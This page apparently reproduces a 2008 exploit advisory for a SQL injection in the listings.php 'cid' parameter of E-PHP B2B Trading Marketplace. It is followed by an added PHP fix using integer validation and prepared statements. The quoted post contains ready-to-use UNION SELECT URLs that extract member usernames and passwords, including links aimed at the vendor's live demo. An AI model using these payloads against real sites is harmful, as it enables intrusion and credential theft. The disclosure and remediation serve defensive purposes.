Already discovered: http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt
cceb7b553c51129e88d5553fdcb5129d
E-PHP B2B Trading Marketplace Scripts suffers from a remote SQL injection vulnerability in listings.php.
Homepage: http://www.darkc0de.com/
Authored By r45c4l (r45c4l[at]hotmail.com)

On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote:

> |___________________________________________________|
> |
> | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
> |
> |___________________________________________________
> |---------------------Hussin X----------------------|
> |
> | Author: Hussin X
> |
> | Home : WwW.Hussin-X.CoM <http://www.hussin-x.com/> | www.tryag.cc/cc
> |
> | email: darkangel_g85[at]Yahoo[DoT]com
> |
> |___________________________________________________
> |
> | script : http://www.ephpscripts.com
> |
> |___________________________________________________|
>
> Exploit:
>
> www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
>
> L!VE DEMO:
>
> INFO
>
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members
> --
>
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
>
> ____________________________( Greetz )_________________________________
> |
> | All members of the Forum WwW.Hussin-X.CoM <http://www.hussin-x.com/> | WwW.TrYaG.CC <http://www.tryag.cc/>
> |
> | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
> |
> | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori
> |______________________________________________________________________
>
> Im IRAQi
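The flaw quoted above is the classic one: the `cid` value from the query string is dropped straight into the SQL text, so a crafted value can append a UNION SELECT against the `ephpb2b_members` table. The following is an added example, not code from the advisory or from the E-PHP B2B product, of how a listings.php handler can close that hole: validate `cid` as an integer and bind it through a prepared statement, so user input never becomes part of the SQL. The table `ephpb2b_listings`, its columns, the `type` filter and the DSN/credentials are assumptions for illustration; only `ephpb2b_members` is named on the page.

```php
<?php
// Added example: hardened handling of the listings.php "cid" parameter.
// Table/column names other than ephpb2b_members are assumed, not taken from the product.
declare(strict_types=1);

function listingsByCategory(PDO $db, array $query): array
{
    // 1. Type-validate: cid must be a positive integer, so a value such as
    //    "-1 union select ..." is rejected before any SQL is built.
    $cid = filter_var($query['cid'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($cid === false) {
        http_response_code(400);
        return [];
    }

    // 2. The "browse" value is also attacker-controlled: allow only known values.
    $browse = $query['browse'] ?? 'sell';
    if (!in_array($browse, ['sell', 'buy'], true)) {
        http_response_code(400);
        return [];
    }

    // 3. Bind both values with a prepared statement. The SQL string is constant;
    //    the database sees cid and browse as data, never as query text, which is
    //    what removes the injection rather than any escaping of the input.
    $stmt = $db->prepare(
        'SELECT id, title, price FROM ephpb2b_listings WHERE cid = :cid AND type = :browse'
    );
    $stmt->execute([':cid' => $cid, ':browse' => $browse]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Placeholder DSN and credentials (assumed); native prepares are enforced so the
// driver does not fall back to client-side string interpolation.
$db = new PDO('mysql:host=localhost;dbname=ephpb2b', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$rows = listingsByCategory($db, $_GET);
header('Content-Type: application/json');
echo json_encode($rows);
```

A request carrying the quoted payload now yields an HTTP 400 from the integer check and never reaches the database; logging those rejected requests gives a cheap detection signal for probing of this endpoint.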